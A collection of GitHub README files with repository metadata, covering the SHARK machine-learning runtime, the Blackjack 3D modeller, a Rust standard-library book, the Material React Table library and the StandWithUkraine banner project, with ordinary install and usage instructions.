### Run Stable Diffusion on your device - WebUI
#### Windows 10/11 Users
```powershell
(shark1.venv) PS C:\g\shark> cd .\apps\stable_diffusion\web\
(shark1.venv) PS C:\g\shark\apps\stable_diffusion\web> python .\index.py
```
#### Linux / macOS Users
```shell
(shark1.venv) > cd apps/stable_diffusion/web
(shark1.venv) > python index.py
```
#### Access Stable Diffusion on http://localhost:8080/?__theme=dark
<img width="1607" alt="webui" src="https://user-images.githubusercontent.com/74956/204939260-b8308bc2-8dc4-47f6-9ac0-f60b66edab99.png">
### Run Stable Diffusion on your device - Commandline
#### Windows 10/11 Users
```powershell
(shark1.venv) PS C:\g\shark> python .\apps\stable_diffusion\scripts\main.py --app="txt2img" --precision="fp16" --prompt="tajmahal, snow, sunflowers, oil on canvas" --device="vulkan"
```
#### Linux / macOS Users
```shell
python3.11 apps/stable_diffusion/scripts/main.py --app=txt2img --precision=fp16 --device=vulkan --prompt="tajmahal, oil on canvas, sunflowers, 4k, uhd"
```
You can replace `vulkan` with `cpu` to run on your CPU or with `cuda` to run on CUDA devices. If you have multiple vulkan devices you can address them with `--device=vulkan://1` etc
</details>
The output on an AMD 7900XTX would look something like:
```shell
Average step time: 47.19188690185547ms/it
Clip Inference time (ms) = 109.531
VAE Inference time (ms): 78.590
Total image generation time: 2.5788655281066895sec
```
Here are some samples generated:
![tajmahal, snow, sunflowers, oil on canvas_0](https://user-images.githubusercontent.com/74956/204934186-141f7e43-6eb2-4e89-a99c-4704d20444b3.jpg)
![a photo of a crab playing a trumpet](https://user-images.githubusercontent.com/74956/204933258-252e7240-8548-45f7-8253-97647d38313d.jpg)
Find us on [SHARK Discord server](https://discord.gg/RUqY2h2s9u) if you have any trouble with running it on your hardware.
<details>
<summary>Binary Installation</summary>
### Setup a new pip Virtual Environment
This step sets up a new VirtualEnv for Python
```shell
python --version #Check you have 3.11 on Linux, macOS or Windows Powershell
python -m venv shark_venv
source shark_venv/bin/activate # Use shark_venv/Scripts/activate on Windows
# If you are using conda, create and activate a new conda env instead
# Some older pip installs may not be able to handle the recent PyTorch deps
python -m pip install --upgrade pip
```
*macOS Metal* users please install https://sdk.lunarg.com/sdk/download/latest/mac/vulkan-sdk.dmg and enable "System wide install"
### Install SHARK
This step pip-installs SHARK and related packages (Python 3.8, 3.10, and 3.11 on Linux; Python 3.11 on macOS and Windows)
```shell
pip install nodai-shark -f https://nod-ai.github.io/SHARK/package-index/ -f https://llvm.github.io/torch-mlir/package-index/ -f https://nod-ai.github.io/SRT/pip-release-links.html --extra-index-url https://download.pytorch.org/whl/nightly/cpu
```
### Run shark tank model tests.
```shell
pytest tank/test_models.py
```
See tank/README.md for a more detailed walkthrough of our pytest suite and CLI.
### Download and run Resnet50 sample
```shell
curl -O https://raw.githubusercontent.com/nod-ai/SHARK/main/shark/examples/shark_inference/resnet50_script.py
#Install deps for test script
pip install --pre torch torchvision torchaudio tqdm pillow gsutil --extra-index-url https://download.pytorch.org/whl/nightly/cpu
python ./resnet50_script.py --device="cpu" #use cuda or vulkan or metal
```
### Download and run BERT (MiniLM) sample
```shell
curl -O https://raw.githubusercontent.com/nod-ai/SHARK/main/shark/examples/shark_inference/minilm_jit.py
#Install deps for test script
pip install transformers torch --extra-index-url https://download.pytorch.org/whl/nightly/cpu
python ./minilm_jit.py --device="cpu" #use cuda or vulkan or metal
```
</details>
<details>
<summary>Development, Testing and Benchmarks</summary>
If you want to use Python 3.11 together with the TF import tools, you can set the environment variables like this:
Set `USE_IREE=1` to use upstream IREE
```
# PYTHON=python3.11 VENV_DIR=0617_venv IMPORTER=1 ./setup_venv.sh
```
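As a sketch, combining those variables with the `USE_IREE` switch mentioned above (the venv name is just the example from the comment above):
```shell
# use upstream IREE, Python 3.11, a custom venv directory and the TF importer
USE_IREE=1 PYTHON=python3.11 VENV_DIR=0617_venv IMPORTER=1 ./setup_venv.sh
```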
### Run any of the hundreds of SHARK tank models via the test framework
```shell
python -m shark.examples.shark_inference.resnet50_script --device="cpu" # Use gpu | vulkan
# Or a pytest
pytest tank/test_models.py -k "MiniLM"
```
### How to use your locally built IREE / Torch-MLIR with SHARK
If you are a *Torch-mlir developer or an IREE developer* and want to test local changes you can uninstall
the provided packages with `pip uninstall torch-mlir` and / or `pip uninstall iree-compiler iree-runtime` and build locally
with Python bindings and set your PYTHONPATH as mentioned [here](https://github.com/iree-org/iree/tree/main/docs/api_docs/python#install-iree-binaries)
for IREE and [here](https://github.com/llvm/torch-mlir/blob/main/development.md#setup-python-environment-to-export-the-built-python-packages)
for Torch-MLIR.
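For a locally built IREE, that usually amounts to exporting `PYTHONPATH` to the Python bindings inside your build tree. This is only a rough sketch; the exact layout depends on your build configuration, so check the IREE docs linked above:
```shell
# <iree-build-dir> is a placeholder for your local IREE build directory
export PYTHONPATH=<iree-build-dir>/compiler/bindings/python:<iree-build-dir>/runtime/bindings/python:$PYTHONPATH
```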
How to use your locally built Torch-MLIR with SHARK:
```shell
1.) Run `./setup_venv.sh` in SHARK and activate the `shark.venv` virtual env.
2.) Run `pip uninstall torch-mlir`.
3.) Go to your local Torch-MLIR directory.
4.) Activate the mlir_venv virtual environment.
5.) Run `pip uninstall -r requirements.txt`.
6.) Run `pip install -r requirements.txt`.
7.) Build Torch-MLIR.
8.) Activate the shark.venv virtual environment from the Torch-MLIR directory.
9.) Run `export PYTHONPATH=`pwd`/build/tools/torch-mlir/python_packages/torch_mlir:`pwd`/examples` in the Torch-MLIR directory.
10.) Go to the SHARK directory.
```
Now SHARK will use your locally built Torch-MLIR repo.
## Benchmarking Dispatches
To produce benchmarks of individual dispatches, you can add `--dispatch_benchmarks=All --dispatch_benchmarks_dir=<output_dir>` to your pytest command line argument.
If you only want to compile specific dispatches, you can specify them with a space-separated string instead of `"All"`, e.g. `--dispatch_benchmarks="0 1 2 10"`
For example, to generate and run dispatch benchmarks for MiniLM on CUDA:
```
pytest -k "MiniLM and torch and static and cuda" --dispatch_benchmarks=All -s --dispatch_benchmarks_dir=./my_dispatch_benchmarks
```
The given command will populate `<dispatch_benchmarks_dir>/<model_name>/` with an `ordered_dispatches.txt` that lists and orders the dispatches and their latencies, as well as folders for each dispatch that contain .mlir, .vmfb, and results of the benchmark for that dispatch.
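To benchmark only a subset of dispatches, the same command can be given an explicit list instead of `All` (the indices below are arbitrary examples):
```
pytest -k "MiniLM and torch and static and cuda" --dispatch_benchmarks="0 1 2 10" -s --dispatch_benchmarks_dir=./my_dispatch_benchmarks
```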
If you want to incorporate this into a Python script instead, you can pass the `dispatch_benchmarks` and `dispatch_benchmarks_dir` arguments when initializing `SharkInference`, and the benchmarks will be generated when the module is compiled, e.g.:
```
shark_module = SharkInference(
mlir_model,
device=args.device,
mlir_dialect="tm_tensor",
dispatch_benchmarks="all",
dispatch_benchmarks_dir="results"
)
```
Output will include:
- An ordered list (`ordered_dispatches.txt`) of all the dispatches with their runtimes
- Inside the specified directory, there will be a directory for each dispatch (there will be mlir files for all dispatches, but only compiled binaries and benchmark data for the specified dispatches)
- An .mlir file containing the dispatch benchmark
- A compiled .vmfb file containing the dispatch benchmark
- An .mlir file containing just the hal executable
- A compiled .vmfb file of the hal executable
- A .txt file containing benchmark output
See tank/README.md for further instructions on how to run model tests and benchmarks from the SHARK tank.
</details>
<details>
<summary>API Reference</summary>
### Shark Inference API
```
from shark.shark_importer import SharkImporter
# SharkImporter imports mlir file from the torch, tensorflow or tf-lite module.
mlir_importer = SharkImporter(
torch_module,
(input),
frontend="torch", #tf, #tf-lite
)
torch_mlir, func_name = mlir_importer.import_mlir(tracing_required=True)
# SharkInference accepts mlir in linalg, mhlo, and tosa dialect.
from shark.shark_inference import SharkInference
shark_module = SharkInference(torch_mlir, device="cpu", mlir_dialect="linalg")
shark_module.compile()
result = shark_module.forward((input))
```
### Example demonstrating running MHLO IR.
```
from shark.shark_inference import SharkInference
import numpy as np
mhlo_ir = r"""builtin.module {
func.func @forward(%arg0: tensor<1x4xf32>, %arg1: tensor<4x1xf32>) -> tensor<4x4xf32> {
%0 = chlo.broadcast_add %arg0, %arg1 : (tensor<1x4xf32>, tensor<4x1xf32>) -> tensor<4x4xf32>
%1 = "mhlo.abs"(%0) : (tensor<4x4xf32>) -> tensor<4x4xf32>
return %1 : tensor<4x4xf32>
}
}"""
arg0 = np.ones((1, 4)).astype(np.float32)
arg1 = np.ones((4, 1)).astype(np.float32)
shark_module = SharkInference(mhlo_ir, device="cpu", mlir_dialect="mhlo")
shark_module.compile()
result = shark_module.forward((arg0, arg1))
```
</details>
## Examples Using the REST API
* [Setting up SHARK for use with Blender](./docs/shark_sd_blender.md)
* [Setting up SHARK for use with Koboldcpp](./docs/shark_sd_koboldcpp.md)
## Supported and Validated Models
SHARK is maintained to support the latest innovations in ML Models:
| TF HuggingFace Models | SHARK-CPU | SHARK-CUDA | SHARK-METAL |
|---------------------|----------|----------|-------------|
| BERT | :green_heart: | :green_heart: | :green_heart: |
| DistilBERT | :green_heart: | :green_heart: | :green_heart: |
| GPT2 | :green_heart: | :green_heart: | :green_heart: |
| BLOOM | :green_heart: | :green_heart: | :green_heart: |
| Stable Diffusion | :green_heart: | :green_heart: | :green_heart: |
| Vision Transformer | :green_heart: | :green_heart: | :green_heart: |
| ResNet50 | :green_heart: | :green_heart: | :green_heart: |
For a complete list of the models supported in SHARK, please refer to [tank/README.md](https://github.com/nod-ai/SHARK/blob/main/tank/README.md).
## Communication Channels
* [SHARK Discord server](https://discord.gg/RUqY2h2s9u): Real time discussions with the SHARK team and other users
* [GitHub issues](https://github.com/nod-ai/SHARK/issues): Feature requests, bugs etc
## Related Projects
<details>
<summary>IREE Project Channels</summary>
* [Upstream IREE issues](https://github.com/google/iree/issues): Feature requests,
bugs, and other work tracking
* [Upstream IREE Discord server](https://discord.gg/wEWh6Z9nMU): Daily development
discussions with the core team and collaborators
* [iree-discuss email list](https://groups.google.com/forum/#!forum/iree-discuss):
Announcements, general and low-priority discussion
</details>
<details>
<summary>MLIR and Torch-MLIR Project Channels</summary>
* `#torch-mlir` channel on the LLVM [Discord](https://discord.gg/xS7Z362) - this is the most active communication channel
* Torch-MLIR Github issues [here](https://github.com/llvm/torch-mlir/issues)
* [`torch-mlir` section](https://llvm.discourse.group/c/projects-that-want-to-become-official-llvm-projects/torch-mlir/41) of LLVM Discourse
* Weekly meetings on Mondays 9AM PST. See [here](https://discourse.llvm.org/t/community-meeting-developer-hour-refactoring-recurring-meetings/62575) for more information.
* [MLIR topic within LLVM Discourse](https://llvm.discourse.group/c/llvm-project/mlir/31)

SHARK and IREE are enabled by and heavily rely on [MLIR](https://mlir.llvm.org).
</details>
## License
nod.ai SHARK is licensed under the terms of the Apache 2.0 License with LLVM Exceptions.
See [LICENSE](LICENSE) for more information.
| SHARK - High Performance Machine Learning Distribution | deep-learning,machine-learning,mlir,pytorch,amd,apple-silicon,nvidia | 672 | 86 | 1,557 | 1,743 | 348 | 59 | 3 |
setzer22/blackjack | <p align="center">
<img src="https://user-images.githubusercontent.com/7241990/178050668-b4e6fbba-dde2-4688-800a-e1a8458520a0.svg">
</p>
> Your Rusty 🦀 procedural 3d modeler
![GitHub CI](https://github.com/setzer22/blackjack/actions/workflows/ci.yml/badge.svg)
![MPL](https://img.shields.io/badge/license-MPL%202%2E0-blue.svg)
**ARCHIVED REPOSITORY** This repository is now archived because of a variety of technical and political reasons that made me lose my motivation to continue contributing to the Rust community in my free time.
**Blackjack** is a procedural modelling application, following the steps of great tools like [Houdini](https://www.sidefx.com/) or [Blender's geometry nodes project](https://docs.blender.org/manual/en/latest/modeling/geometry_nodes/index.html). At its core, Blackjack is a simple node-driven interface where you can compose operations to create a 3d mesh in a non-destructive way.
![Main interaface of Blackjack](https://user-images.githubusercontent.com/7241990/178053206-94f4e976-984c-4611-9d63-d591d231b014.png)
![Another gif showcasing procedural modelling in Blackjack](https://user-images.githubusercontent.com/7241990/178054513-75232c00-7bd0-4e26-9474-ab2b71960c6e.gif)
![A third gif showcasing procedural modelling in Blackjack](https://user-images.githubusercontent.com/7241990/178053667-9e72131c-bb2b-4ffa-aab9-afdf5c51033e.gif)
![Gif showcasing procedural modelling in Blackjack](./doc/resources/blackjack_gif3.gif)
## Features and goals
Blackjack **does not aim to replace an industry powerhouse such as Houdini**. Instead, it aims to provide a less cluttered, more robust and user-friendly experience for a small subset of the features that make these tools a great fit in the world of game development and real-time simulations.
Here are the main goals and philosophy behind Blackjack; note that they describe the direction things are heading in, not their current state.
- **Procedural polygonal modelling, first and foremost**: The main focus in Blackjack is the creation of low-poly procedural assets like the ones one would see in videogames. In particular, surface extraction of volumetric data is not among its goals.
- **Flexible node-based interface:** Build complex node graphs, create reusable functions, and tweak every parameter in real-time!
- **Integration with popular game engines:** Export your procedural assets as tiny programs and tweak their parameters at runtime by adding a simple library to your engine of choice.
- **Error resilience, crash resistance:** When things go wrong, Blackjack will make an effort to *respect your time* as a user and not lose your work. Errors will be clearly communicated and fixing any bugs leading to a crash will take the highest priority.
## Install and usage
> **Note**: A crates.io version cannot be published due to unreleased dependencies. Blackjack depends on the bleeding edge version of some crates and requires custom forks for some others. This situation may change once development stabilizes.
Here are the steps in order to try out the early development version of Blackjack. Binaries and easier installation methods will be provided in the future. The steps below require a complete Rust toolchain using `cargo`, with a minimum supported Rust version (MSRV) of **1.62.0**.
1. Clone this repository, and make sure to download LFS files. In some systems, this may require separately installing a `git-lfs`[^1] package:
```bash
git clone https://github.com/setzer22/blackjack
git lfs install
git lfs fetch --all
git lfs pull
```
[^1]: Linux users can install `git-lfs` with their distro's package manager (`apt install git-lfs` / `yum install git-lfs` / `pacman -S git-lfs`). MacOS users using homebrew can use `brew install git-lfs`. Other users should follow the [git-lfs install instructions](https://git-lfs.github.com/).
2. Install build dependencies. This may not cover everything, please file an issue or a pull request if you find anything missing:
* Ubuntu/Debian: `sudo apt install libfontconfig-dev`
* Arch Linux: `sudo pacman -S fontconfig`
* Fedora: `sudo dnf install fontconfig-devel`
> **Note**: The `fontconfig` native dependency is temporary, and will no longer be necessary once this upstream issue is fixed: https://github.com/rust-windowing/winit/issues/2373
3. From the same folder, run `cargo run --release --bin blackjack_ui` to launch Blackjack.
### Usage
Some minimal usage instructions. Please do note that these can and will change frequently during early development:
- The bottom section of the screen is the node graph.
- Use right click to open the node selector. Find a node and spawn it by clicking on it. You can also use the search bar.
- Nodes can be dragged around, and their widgets can be interacted with using the mouse.
- Dragging the mouse between two nodes' ports will create a connection.
- Use the 'Set active' button under a node to make it render to the screen.
## Tech stack
Blackjack is built using Rust 🦀 and stands on the shoulders of giants. Here's a shout out to some great rust crates being used in this project:
- [rend3](https://github.com/BVE-Reborn/rend3) is used for all rendering purposes.
- [egui](https://github.com/emilk/egui) is used as the UI toolkit powering all 2d interaction.
- [wgpu](https://github.com/gfx-rs/wgpu), as the base of `rend3`, is used for all custom visual effects.
- [mlua](https://github.com/khvzak/mlua) is used to integrate [Luau](https://github.com/Roblox/luau) as an extension language.
## Tool Maturity
Blackjack is still under active development. Many features are missing and are bound to change. For now, **no promises are made with regards to stability**, but API breakage will be considered only when absolutely necessary.
## Contributing
Contributions are welcome! Before writing a PR, please get in touch by filing an issue 😄
| A procedural, node-based modelling tool, made in rust 🦀 | null | 1 | 9 | 49 | 503 | 25 | 37 | 2 |
Warrenren/inside-rust-std-library | # inside-rust-std-library
实体书已经出版,名字为《深入rust标准库》,正在预售,可在京东搜索到。欢迎大家采购实体书籍,给作者一些支持。
本书主要对RUST的标准库代码进行分析。
本书尽可能给读者找出一条标准库代码的阅读脉络。同时,分析不仅仅针对代码的功能,也针对代码背后的需求及若干代码设计的思路。
C语言精通的标志是对指针的精通。RUST的裸指针也是RUST的最基础及最核心的难点之一。
所以,将裸指针及相关的内存模块作为代码分析的起始点,熟悉了裸指针及内存,自然也就对所有权,借用,生命周期的本质有了深刻的理解,RUST语言的最难关便过了。
泛型是RUST不可分割的语法之一,而对于其他语言,没有泛型不影响语言的使用。泛型及基于trait的泛型约束是RUST的另一个代码基础。
针对基本类型的分析,可以看到RUST利用trait语法使之具备了无限的扩展性,这是RUST更有表现力的语法能力的展现。
Option<T>/Result<T,E>等类型实际完全是由标准库定义的,并不是RUST语言最底层的基本内容,可以从代码分析中发现这一点。
所有的运算符都可以重载,且可以跨越类型重载,RUST的运算符重载揭示了RUST很多的编码奥秘及技巧。
Iterator加闭包是函数式编程的基础构架,Iterator的适配器构成了函数式编程的基础设施,RUST完整的实现了这些内容,并且几乎为每个类型都实现了迭代器,并尽可能的为函数式编程做好了准备。
Cell<T>/RefCell<T>/Pin<T>/Lazy<T>代码证明了在RUST的基础语法下,如何创造性的解决问题。
Box<T>/RawVec<T>是两个堆内存申请的基本结构,善用这两个结构,除非写内存管理,基本上就不必再接触底层的堆内存申请及释放。
每一个智能指针实际上也是RUST对经典的数据结构实现的精妙例程。
RUST对不同操作系统的适配让程序员不必象C那样再重复的耗费精力并且还沾沾自喜于此份工作。
仅支持异步编程的async/await,Future也体现了RUST的作最基础的工作的态度。
...
...
(This book focuses on the analysis of RUST's standard library code.
This book tries, as far as possible, to give readers a path for reading the standard library code. At the same time, the analysis covers not only what the code does, but also the requirements behind it and some of the ideas in its design.
The hallmark of C proficiency is mastery of pointers. Raw pointers are likewise one of the most fundamental and difficult parts of RUST. Therefore, raw pointers and the associated memory modules are used as the starting point for the code analysis; familiarity with raw pointers and memory naturally leads to a deep understanding of the nature of ownership, borrowing, and lifetimes. With that, the hardest part of RUST is over.
Generics are an integral part of RUST's syntax, and for other languages, the absence of generics does not affect language use. Generics and their trait - based generic constraints are another code base of RUST.
Based on the analysis of primitive types, it can be seen that RUST makes use of trait syntax to make primitive types infinitely extensible, which is a demonstration of RUST's more expressive syntax ability.
Types such as Option<T>/Result<T, E> are actually defined entirely by the standard library and are not the basic content of the lowest level of the RUST language, as you can see from code analysis.
All operators can be overloaded and can cross type overloading. Operator overloading in RUST reveals many of RUST's coding secrets and tricks.
Iterator plus closures are the foundation of functional programming. The adapters of Iterator make up the infrastructure of functional programming. RUST implements them completely, implementing iterators for almost every type and preparing them as well as possible for functional programming.
The Cell/RefCell/Pin/Lazy source code demonstrates how creative problem solving can be done within RUST's basic syntax.
Box/RawVec are the two basic structures of heap memory allocation and freeing.
Each smart pointer is actually an elegant routine of RUST's implementation of classical data structures.
RUST's adaptation of different operating systems saves programmers from the repetitive effort and complacency of C.
Supporting only async/await for asynchronous programming, Future also embodies RUST's attitude of doing the most basic work.
...
...
)
| 本书已经正式出版,目前正预售,可在京东搜索《深入RUST标准库》即可。本书主要对RUST的标准库代码进行分析,并试图给出RUST标准库代码的分析脉络。This project try to give a venation of how reading the RUST standard library source code. | null | 0 | 1 | 6 | 137 | 7 | 1 | 0 |
KevinVandy/material-react-table | # Material React Table V2
View [Documentation](https://www.material-react-table.com/)
<a href="https://npmjs.com/package/material-react-table" target="_blank">
<img alt="" src="https://badgen.net/npm/v/material-react-table?color=blue" />
</a>
<a href="https://npmtrends.com/material-react-table" target="_blank">
<img alt="" src="https://badgen.net/npm/dt/material-react-table?label=installs&icon=npm&color=blue" />
</a>
<a href="https://bundlephobia.com/result?p=material-react-table" target="_blank">
<img alt="" src="https://badgen.net/bundlephobia/minzip/material-react-table@latest?color=blue" />
</a>
<a href="https://star-history.com/#kevinvandy/material-react-table&Date" target="_blank">
<img alt="" src="https://badgen.net/github/stars/KevinVandy/material-react-table?color=blue" />
</a>
<a href="https://github.com/KevinVandy/material-react-table/blob/v2/LICENSE" target="_blank">
<img alt="" src="https://badgen.net/github/license/KevinVandy/material-react-table?color=blue" />
</a>
<a
href="https://github.com/sponsors/kevinvandy"
target="_blank"
rel="noopener"
>
<img alt="" src="https://img.shields.io/badge/sponsor-violet" />
</a>
<a
href="https://discord.gg/5wqyRx6fnm"
target="_blank"
rel="noopener"
>
<img alt="" src="https://dcbadge.vercel.app/api/server/5wqyRx6fnm?style=flat">
</a>
## About
### _Quickly Create React Data Tables with Material Design_
### **Built with [Material UI <sup>V5</sup>](https://mui.com) and [TanStack Table <sup>V8</sup>](https://tanstack.com/table/v8)**
<img src="https://material-react-table.com/banner.png" alt="MRT" height="50" />
> Want to use Mantine instead of Material UI? Check out [Mantine React Table](https://www.mantine-react-table.com)
## Learn More
- Join the [Discord](https://discord.gg/5wqyRx6fnm) server to join in on the development discussion or ask questions
- View the [Docs Website](https://www.material-react-table.com/)
- See all [Props, Options, APIs, Components, and Hooks](https://www.material-react-table.com/docs/api)
### Quick Examples
- [Basic Table](https://www.material-react-table.com/docs/examples/basic/) (See Default Features)
- [Minimal Table](https://www.material-react-table.com/docs/examples/minimal/) (Turn off Features like Pagination, Sorting, Filtering, and Toolbars)
- [Advanced Table](https://www.material-react-table.com/docs/examples/advanced/) (See some of the Advanced Features)
- [Custom Headless Table](https://www.material-react-table.com/docs/examples/custom-headless/) (Build your own table markup)
- [Dragging / Ordering Examples](https://www.material-react-table.com/docs/examples/column-ordering/) (Drag and Drop)
- [Editing (CRUD) Examples](https://www.material-react-table.com/docs/examples/editing-crud/) (Create, Edit, and Delete Rows)
- [Expanding / Grouping Examples](https://www.material-react-table.com/docs/examples/aggregation-and-grouping/) (Sum, Average, Count, etc.)
- [Filtering Examples](https://www.material-react-table.com/docs/examples/filter-variants/) (Faceted Values, Switching Filters, etc.)
- [Sticky Pinning Examples](https://www.material-react-table.com/docs/examples/sticky-header/) (Sticky Headers, Sticky Columns, Sticky Rows, etc.)
- [Remote Data Fetching Examples](https://www.material-react-table.com/docs/examples/react-query/) (Server-side Pagination, Sorting, and Filtering)
- [Virtualized Examples](https://www.material-react-table.com/docs/examples/virtualized/) (10,000 rows at once!)
- [Infinite Scrolling](https://www.material-react-table.com/docs/examples/infinite-scrolling/) (Fetch data as you scroll)
- [Localization (i18n)](https://www.material-react-table.com/docs/guides/localization#built-in-locale-examples) (Over a dozen languages built-in)
View additional [storybook examples](https://www.material-react-table.dev/)
## Features
_All features can easily be enabled/disabled_
_**Fully Fleshed out [Docs](https://www.material-react-table.com/docs/guides#guides) are available for all features**_
- [x] 30-56kb gzipped - [Bundlephobia](https://bundlephobia.com/package/material-react-table)
- [x] Advanced TypeScript Generics Support (TypeScript Optional)
- [x] Aggregation and Grouping (Sum, Average, Count, etc.)
- [x] Cell Actions (Right-click Context Menu)
- [x] Click To Copy Cell Values
- [x] Column Action Dropdown Menu
- [x] Column Hiding
- [x] Column Ordering via Drag'n'Drop
- [x] Column Pinning (Freeze Columns)
- [x] Column Resizing
- [x] Customize Icons
- [x] Customize Styling of internal Mui Components
- [x] Data Editing and Creating (5 different editing modes)
- [x] Density Toggle
- [x] Detail Panels (Expansion)
- [x] Faceted Value Generation for Filter Options
- [x] Filtering (supports client-side and server-side)
- [x] Filter Match Highlighting
- [x] Full Screen Mode
- [x] Global Filtering (Search across all columns, rank by best match)
- [x] Header Groups & Footers
- [x] Localization (i18n) support
- [x] Manage your own state or let the table manage it internally for you
- [x] Pagination (supports client-side and server-side)
- [x] Row Actions (Your Custom Action Buttons)
- [x] Row Numbers
- [x] Row Ordering via Drag'n'Drop
- [x] Row Pinning
- [x] Row Selection (Checkboxes)
- [x] SSR compatible
- [x] Sorting (supports client-side and server-side)
- [x] Theming (Respects your Material UI Theme)
- [x] Toolbars (Add your own action buttons)
- [x] Tree Data / Expanding Sub-rows
- [x] Virtualization (@tanstack/react-virtual)
## Getting Started
### Installation
View the full [Installation Docs](https://www.material-react-table.com/docs/getting-started/install)
1. Ensure that you have React 18 or later installed
2. Install Peer Dependencies (Material UI V5)
```bash
npm install @mui/material @mui/x-date-pickers @mui/icons-material @emotion/react @emotion/styled
```
3. Install material-react-table
```bash
npm install material-react-table
```
> _`@tanstack/react-table`, `@tanstack/react-virtual`, and `@tanstack/match-sorter-utils`_ are internal dependencies, so you do NOT need to install them yourself.
### Usage
> Read the full usage docs [here](https://www.material-react-table.com/docs/getting-started/usage/)
```jsx
import { useMemo, useState, useEffect } from 'react';
import {
MaterialReactTable,
useMaterialReactTable,
} from 'material-react-table';
//data must be stable reference (useState, useMemo, useQuery, defined outside of component, etc.)
const data = [
{
name: 'John',
age: 30,
},
{
name: 'Sara',
age: 25,
},
];
export default function App() {
const columns = useMemo(
() => [
{
accessorKey: 'name', //simple recommended way to define a column
header: 'Name',
muiTableHeadCellProps: { sx: { color: 'green' } }, //optional custom props
Cell: ({ cell }) => <span>{cell.getValue()}</span>, //optional custom cell render
},
{
accessorFn: (row) => row.age, //alternate way
id: 'age', //id required if you use accessorFn instead of accessorKey
header: 'Age',
Header: () => <i>Age</i>, //optional custom header render
},
],
[],
);
//optionally, you can manage any/all of the table state yourself
const [rowSelection, setRowSelection] = useState({});
useEffect(() => {
//do something when the row selection changes
}, [rowSelection]);
const table = useMaterialReactTable({
columns,
data,
enableColumnOrdering: true, //enable some features
enableRowSelection: true,
enablePagination: false, //disable a default feature
onRowSelectionChange: setRowSelection, //hoist internal state to your own state (optional)
state: { rowSelection }, //manage your own state, pass it back to the table (optional)
});
const someEventHandler = () => {
//read the table state during an event from the table instance
console.log(table.getState().sorting);
};
return (
<MaterialReactTable table={table} /> //other more lightweight MRT sub components also available
);
}
```
_Open in [Code Sandbox](https://codesandbox.io/s/simple-material-react-table-example-t5c3ji)_
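If you use TypeScript, the column definitions above can be strongly typed with the exported `MRT_ColumnDef` generic. A minimal sketch follows; the `Person` row shape here is just an illustrative assumption, not part of the library:

```tsx
import { type MRT_ColumnDef } from 'material-react-table';

// illustrative row shape for this sketch
type Person = {
  name: string;
  age: number;
};

// typing the array gives autocomplete and type-checking for accessorKey, header, etc.
const columns: MRT_ColumnDef<Person>[] = [
  { accessorKey: 'name', header: 'Name' },
  { accessorKey: 'age', header: 'Age' },
];
```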
## Contributors
<a href="https://github.com/kevinvandy/material-react-table/graphs/contributors">
<img src="https://contrib.rocks/image?repo=kevinvandy/material-react-table" />
</a>
PRs are Welcome, but please discuss in [GitHub Discussions](https://github.com/KevinVandy/material-react-table/discussions) or the [Discord Server](https://discord.gg/5wqyRx6fnm) first if it is a large change!
Read the [Contributing Guide](https://github.com/KevinVandy/material-react-table/blob/v2/CONTRIBUTING.md) to learn how to run this project locally.
<!-- Use the FORCE, Luke! -->
| A fully featured Material UI V5 implementation of TanStack React Table V8, written from the ground up in TypeScript | react,typescript,react-table,material-table,material-ui,data-table,tanstack,datagrid | 140 | 98 | 245 | 1,469 | 58 | 3 | 2 |
vshymanskyy/StandWithUkraine | [![GitHub stars](https://img.shields.io/github/stars/vshymanskyy/StandWithUkraine.svg)](https://github.com/vshymanskyy/StandWithUkraine/stargazers)
[![GitHub issues](https://img.shields.io/github/issues/vshymanskyy/StandWithUkraine.svg)](https://github.com/vshymanskyy/StandWithUkraine/issues)
[![StandWithUkraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/badges/StandWithUkraine.svg)](https://github.com/vshymanskyy/StandWithUkraine/blob/main/docs/README.md)
This repository contains **Readme Banners** (and some useful docs) that can be used by OSS projects to spread the word, support and help Ukraine in this disastrous situation. Like this **(click to open)**:
[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner2-direct.svg)](https://vshymanskyy.github.io/StandWithUkraine/)
### 📢 [Updates from Ukrainian Open Source Community](/docs/CommunityUpdates.md)
### 🇷🇺 [Обращение к гражданам России](/docs/ToRussianPeople.md)
## For Maintainers and Authors
1. Spread the word. [Add one of the banners](/docs/AddBanner.md) to your **`README.md`**. Badges are also available (an example snippet is shown right after this list)
2. Get rid of [Russian software and dependencies](/docs/Boycott.md)
3. Deliver [a message](https://github.com/vshymanskyy/StandWithUkraine/blob/main/docs/ToRussianPeople.md) to your users (esp. those in Russia) along with your next release. See [example here](https://github.com/vshymanskyy/StandWithUkraine/issues/4)
4. Follow the [cyber safety guide](/docs/CyberSafety.md)
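As an example, the "Stand With Ukraine" banner shown above can be embedded near the top of a project's `README.md` with a single line of Markdown (see [AddBanner.md](/docs/AddBanner.md) for all available banners and badges):

```markdown
[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner2-direct.svg)](https://vshymanskyy.github.io/StandWithUkraine/)
```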
## Projects that #StandWithUkraine
- [AssemblyScript](https://github.com/AssemblyScript/assemblyscript) - A variant of TypeScript that compiles to WebAssembly using Binaryen
- [Awesome](https://github.com/sindresorhus/awesome) - Awesome lists about all kinds of interesting topics
- [MacPaw](https://github.com/MacPaw) - A company behind prominent Mac software: CleanMyMac X, Setapp, Gemini 2, The Unarchiver
- [AVA.js](https://github.com/avajs/ava) - A test runner for Node.js that lets you develop with confidence
- [Wasm3](https://github.com/wasm3) - WebAssembly engine
- [Rete.js](https://github.com/retejs/rete) - JavaScript framework for visual programming
- [Blynk](https://github.com/blynkkk/blynk-library) - IoT platform
- [pnpm](https://github.com/pnpm/pnpm) - Fast, disk space efficient package manager
- [PlatformIO](https://github.com/platformio/platformio-core) - A professional collaborative platform for embedded development
- [TinyGSM](https://github.com/vshymanskyy/TinyGSM) - A small Arduino library for GSM modules, that just works
- [wasm2native](https://github.com/vshymanskyy/wasm2native) - Turn WASI apps into native executables
- [node-wasm-run](https://github.com/wasm3/node-wasm-run) - Run arbitrary WASM/WASI files
- [embedded-wasm-apps](https://github.com/wasm3/embedded-wasm-apps) - Statically-compiled WebAssembly apps on any embedded platform
- [php-vast](https://github.com/sokil/php-vast) - VAST Ad generator and parser library on PHP
- [miband-js](https://github.com/vshymanskyy/miband-js) - A clean implementation of Mi Band 2 library for Browsers and Node.js, using WebBluetooth API
- [mailamie](https://github.com/micc83/mailamie) - A simple SMTP catch all server for testing written in PHP
- [ReStable](https://github.com/micc83/ReStable) - jQuery plugin that makes tables responsive converting them to HTML lists
